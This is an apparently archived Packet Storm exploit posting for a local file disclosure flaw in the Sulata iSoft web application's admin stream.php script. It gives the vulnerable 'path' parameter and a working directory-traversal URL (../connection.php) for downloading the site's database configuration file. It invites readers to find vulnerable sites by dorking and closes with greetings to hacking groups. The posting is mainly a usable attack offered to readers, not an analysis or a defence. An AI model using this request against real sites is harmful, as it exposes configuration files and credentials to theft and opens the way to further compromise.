Sulata iSoft Local File Disclosure

2010-12-10T00:00:00
ID PACKETSTORM:96618
Type packetstorm
Reporter Sudden_death
Modified 2010-12-10T00:00:00

Description

                                        
                                            `=========================================================  
Sulata iSoft (stream.php) Local File Disclosure Exploit  
=========================================================  
  
# Exploit Title : Sulata iSoft (developer by Rizwan Azam) you look  
site.com/about.php  
# Date : 10 December 2010  
# Author : Sudden_death  
# Platform/Tested on: Windows XP 2 SP 2  
# myweb : http://sudden.isgreat.org  
# dork : your imagination  
======================================================================  
  
# vuln here  
http://www.site.com/_admin/stream.php?path=  
  
# try to download and watch source file stream.php  
.....  
//include_once("../home/library.php");  
include_once("../connection.php"); <----------------------- look here,,  
This is the config  
suConnect();  
.....  
  
# after we know config, let us download  
http://www.site.com/_admin/stream.php?path=../connection.php  
  
  
[#]-------------------------------------------------------------------  
  
Greets :| bumble_be | kiddies | patriot | Mr.SoOofe | petimati |  
white hat | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0  
d4rk fl00d3r | Ichito-Bandito | james0baster | kaMtiEz | Man In Black | otong |  
r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic |  
cah_surip | angga | demnas | ELV1N4 | jonathan | virgi | scr34mz | Kimmonosz |  
pL4nkt0n | RxN7 | jos_ali_jo | 45tr0_k1ll1n9 | huda_style | zalezero |  
CireSoft49 | r4tu_le64h | cruzen | ranggamagic | Mbah_semar | and all crew's  
yang ga bisa ane sebutin satu persatu |  
Spesial thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org |  
makassarhacker.com ]  
  
note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap  
apa yang kau katakan!  
  
`